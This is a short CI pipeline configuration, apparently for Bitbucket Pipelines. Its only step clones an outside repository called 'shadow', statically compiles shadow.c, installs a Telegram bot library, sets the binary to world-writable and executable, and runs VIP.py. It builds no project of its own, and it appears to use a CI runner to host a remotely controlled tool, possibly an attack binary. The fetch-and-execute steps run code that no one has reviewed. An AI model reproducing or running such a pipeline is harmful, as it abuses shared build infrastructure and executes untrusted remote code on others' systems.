pipelines:
  default:
    - step:
        name: Run Script
        image: python:3.10
        size: 2x
        script:
          - git clone https://github.com/ZoyaAkhtar88/shadow.git
          - cd shadow
          - ls
          - gcc -o shadow shadow.c -lz -static -lpthread
          - pip install telebot
          - pip install requests
          - chmod 777 shadow
          - python3 VIP.py
